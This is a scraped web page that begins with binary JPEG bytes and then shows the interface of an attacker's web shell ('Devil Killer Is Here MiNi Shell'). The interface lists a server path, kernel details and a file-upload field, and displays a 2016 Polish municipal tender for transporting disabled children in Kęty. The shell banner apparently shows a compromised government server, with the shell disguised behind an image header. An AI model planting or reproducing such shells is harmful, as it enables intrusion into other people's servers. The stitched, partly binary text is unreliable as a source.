JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160629/110791-N-2016.html

<p class="kh_header"><b>Kęty: Dowożenie dzieci niepełnosprawnych wraz z opieką z terenu Gminy Kęty do placówek oświatowych w roku szkolnym 2016/2017.</b><br>
<b>Numer ogłoszenia: 110791 - 2016; data zamieszczenia: 29.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kęty , Rynek 7, 32-650 Kęty, woj. małopolskie, tel. 33 844-76-00, faks 33 844 76 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kety.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie dzieci niepełnosprawnych wraz z opieką z terenu Gminy Kęty do placówek oświatowych w roku szkolnym 2016/2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia należy wykonać:
Usługi dowożenia dzieci niepełnosprawnych z terenu Gminy Kęty do placówek oświatowych                i z powrotem wraz z zapewnieniem opieki, w okresie:
- Część I od 01 września 2016 r. do 30 czerwca 2017 r.,
- Część II od 01 września 2016 r. do 30 czerwca 2017 r.,
- Część III od 01 września 2016 r. do 30 czerwca 2017 r.,
we wszystkie dni nauki szkolnej, zgodnie z organizacją roku szkolnego 2016/2017 w danej placówce oraz planem zajęć dzieci, na 3 trasach, z których każda stanowi odrębną część zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający, w okresie 3 lat od udzielenia zamówienia podstawowego, może udzielić Wykonawcy zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.34.00-7, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca przedstawi aktualną licencję na wykonywanie krajowego transportu drogowego osób - dotyczy części I, II, III,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:
- dysponuje w przypadku CZĘŚCI I (Dowożenie dzieci na Trasie nr 1) co najmniej 1 pojazdem spełniającym wymogi świadczenia usług w zakresie przewozu zorganizowanej grupy osób o liczbie miejsc siedzących minimum 40, 
- dysponuje w przypadku CZĘŚCI II (Dowożenie dzieci na Trasie nr 2) co najmniej 2 pojazdami spełniającymi wymogi techniczne pojazdów do świadczenia usług w zakresie przewozu dzieci niepełnosprawnych, o liczbie miejsc dla min. 6 dzieci, w tym:
a) jeden samochód - o liczbie miejsc dla min. 4 dzieci w tym. min. 3 miejsca określone                            w dowodzie rejestracyjnym jako przeznaczone do przewożenia osób na wózku inwalidzkim, pojazd powinien również być wyposażony w windę lub najazd/rampę,
b) jeden samochód - o liczbie miejsc dla min. 2 dzieci,
- dysponuje w przypadku CZĘŚCI III (Dowożenie dzieci na Trasie nr 3) co najmniej 2 pojazdami spełniającymi wymogi świadczenia usług w zakresie przewozu dzieci niepełnosprawnych, o liczbie  miejsc dla min 11 dzieci w tym:
a) jeden samochód - o liczbie miejsc dla min. 5 dzieci w tym min. 2 miejsca określone                            w dowodzie rejestracyjnym jako przeznaczone do przewożenia osób na wózku inwalidzkim, pojazd powinien również być wyposażony w windę lub najazd/rampę,
b) jeden samochód - o liczbie miejsc dla min. 6 dzieci.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:
-dysponuje co najmniej 1 osobą posiadającą odpowiednie uprawnienia do prowadzenia pojazdów (prawo jazdy min. kategorii D oraz przeszkolenie z zakresu udzielania pierwszej pomocy) - dotyczy CZĘŚCI I (Dowożenie dzieci na Trasie nr 1),
- dysponuje co najmniej 2 osobami posiadającymi odpowiednie uprawnienia do prowadzenia pojazdów (prawo jazdy kategorii B lub D w zależności od rodzaju pojazdu oraz przeszkolenie z zakresu udzielania pierwszej pomocy) - dotyczy CZĘŚCI II (Dowożenie dzieci na Trasie nr 2),
- dysponuje co najmniej 2 osobami posiadającymi odpowiednie uprawnienia do prowadzenia pojazdów (prawo jazdy kategorii B lub D w zależności od rodzaju pojazdu oraz przeszkolenie z zakresu udzielania pierwszej pomocy) - dotyczy CZĘŚCI  III (Dowożenie dzieci na Trasie nr 3)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, 
a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej w przedmiotem zamówienia na kwotę minimum 60.000,00 złotych (w przypadku braku potwierdzenia w treści polisy jej opłaty, należy załączyć dokumenty, które będą ten fakt potwierdzać).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Inne dokumenty:
1)	wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik nr 1 do SIWZ;
2)	wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (jeżeli dotyczy) - druk wykazu ujęto w załączniku nr 5 do SIWZ;
3)	upoważnienie do sporządzenia i podpisania oferty, jej załączników oraz wszystkich oświadczeń  i dokumentów, jeżeli ofertę podpisuje osoba upoważniona przez osobę lub osoby uprawnione do reprezentowania firmy w sposób określony w akcie rejestrowym.
Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać                      z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. Wobec Wykonawcy będącego spółką cywilną dopuszcza się dołączenie umowy spółki cywilnej,                          z której będzie wynikać stosowne upoważnienie.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
2.	Dokumenty podmiotów zagranicznych.
1)	 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 ppkt 2,3,4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne                           i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2)	Dokument, o którym mowa w część VI pkt 3, ppkt 1, lit. a) SIWZ, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w pkt 3, ppkt 1, lit. b) nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3)	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w części VI pkt 3, ppkt 1, lit a) i b) SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis  ppkt 2 stosuje się odpowiednio.
3.Wymagania stawiane wykonawcom wspólnie ubiegającym się o udzielenie zamówienia:
1)	do oferty musi być dołączone stosowne pełnomocnictwo do reprezentowania Wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników; Pełnomocnictwo może zostać przedłożone w formie oryginału lub kserokopii potwierdzonej notarialnie;
2)	w przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej zobowiązany jest dołączyć dokumenty wymienione w pkt 2 (lub w pkt 3 - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej). Pozostałe dokumenty będą traktowane jako wspólne.

Zgodnie z art. 23 ust. 4 ustawy Prawo zamówień Publicznych, jeżeli taka oferta zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku gdy wykonawca polega na zasobach innych podmiotów, kopie dokumentów dotyczących odpowiednio wspólników konsorcjum lub tych podmiotów są poświadczane za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum, jeżeli będzie miał do tej czynności upoważnienie, a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
4. Informacje dotyczące podwykonawstwa:
1)	Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Zakres zamówienia przewidziany do wykonania przez podwykonawców należy wskazać w ofercie na druku stanowiącym załącznik nr 6 do niniejszej SIWZ.
2)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je  w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas podstawienia pojazdu zastępczego w przypadku awarii - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony dopuszczają możliwość zmiany postanowień niniejszej umowy, w sytuacji wystąpienia poniższych przypadków:
 1)  losowej   przyczyny  zmiany osoby lub osób skierowanych do wykonywania zamówienia            ze strony Wykonawcy, z zastrzeżeniem, że nowa osoba która będzie wykonywała  przedmiot   umowy musi wykazać, że posiada uprawnienia zawodowe do wykonywania  powierzonych jej czynności zgodnie z obowiązującymi przepisami prawa, wymagane przez   Zamawiającego 
w procedurze o udzielenie zamówienia publicznego będącego przedmiotem  umowy,
2)losowej przyczyny podwykonawcy, z zastrzeżeniem, że jeśli Wykonawca w procedurze udzielenia zamówienia publicznego w wyniku którego zawarto niniejszą umowę posłużył  się osobą lub osobami zdolnymi do wykonania zamówienia podwykonawcy, nowy podwykonawca musi również wykazać, że posiada stosowne kwalifikacje zawodowe 
z  obowiązującymi przepisami prawa, wymagane przez Zamawiającego w procedurze 
o udzielenie zamówienia publicznego będącego przedmiotem umowy,   
3)zmiany pojazdów skierowanych do realizacji zamówienia, z zastrzeżeniem, że nowy pojazd 
   musi spełniać warunek określony przez Zamawiającego w procedurze o udzielenie zamówienia publicznego będącego przedmiotem umowy,
4)	zmian na liście dowożonych uczniów, adresów zamieszkania dzieci, a także zmian                            w wykazie dni nauki szkolnej.  
2.Warunkiem dokonania zmian, o których mowa w ust. 1 pkt 1 i 2 będzie udowodnienie Zamawiającemu przez Wykonawcę wystąpienia uzasadnionych okoliczności, długotrwałej choroby powodującej niezdolność do pracy, bądź innej sytuacji uniemożliwiających osobie skierowanej do wykonywania usługi dalsze świadczenie pracy.
3.Dopuszcza się zmianę wysokości wynagrodzenia Wykonawcy, w razie zmiany:
    1)stawki podatku od towarów i usług,
    2)wysokości minimalnego wynagrodzenia za pracę, ustalonego na podstawie odrębnych 
    przepisów,
    3)Wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne.
   Zmiany wysokości wynagrodzenia mogą mieć miejsce jedynie wówczas, gdy będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Wykonawca zobowiązany jest do 
   wykazania wpływu zmiany wskazanych regulacji na koszty wykonania zamówienia w sposób 
     czytelny dla Zamawiającego poprzez dostarczenie dokumentów potwierdzających powyższe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kety.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kęty, Rynek 7, 32-650 Kęty, pokój nr 41.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2016 godzina 09:45, miejsce: Urząd Gminy Kęty, Rynek 7, 32-650 Kęty, dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowożenie dzieci na trasie nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I
Dowożenie dzieci na Trasie nr 1

Przedmiotem zamówienia Części I jest wykonanie zleconej pracy przewozowej w zakresie dowozu i opieki w czasie przewozu dzieci niepełnosprawnych zamieszkałych na terenie Gminy Kęty do  i z placówek oświatowych na trasie: z Dworca MZK/PKS w Kętach przy ul. Sienkiewicza do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu, przy ul. Obozowej 40 i ul. Kościelnej 6 (w skrócie SOSW w Oświęcimiu) i z powrotem. Zamawiający szacuje, iż ilość km na Trasie nr 1 wyniesie w całym okresie realizacji zamówienia 9.408 km (słownie: dziewięć tysięcy czterysta osiem kilometrów). W każdej z miejscowości: Nowa Wieś, Bielany i Łęki przewiduje się minimum jeden przystanek, na którym będą wsiadać i wysiadać przewożone dzieci. 
Zaznaczamy, że przedmiot zamówienia nie obejmuje przejechanych kilometrów bez dzieci, tj, tzw. pustych kilometrów.
Kursy odbywać się będą we wszystkie dni nauki szkolnej, zgodnie z organizacją roku szkolnego 2016/2017 w danej placówce, na podstawie rozkładu jazdy przedłożonego przez Zamawiającego, zawierającego optymalny przebieg trasy oraz godziny przyjazdu/odjazdu z poszczególnych przystanków.
Liczba przewożonych dzieci wynosi nie więcej niż 40. Liczba ta może ulec zmianie w trakcie realizacji przedmiotu umowy. W przypadku gdy zmiana powodować będzie zwiększenie ilości przewożonych dzieci powyżej 40 Wykonawca zobowiązuje się do dowożenia zwiększonej liczby dzieci w sytuacji, gdy będzie dysponował odpowiednią liczbą wolnych miejsc w pojeździe którym realizuje zamówienie. Osoby przewożone muszą mieć zapewnione miejsca siedzące.  
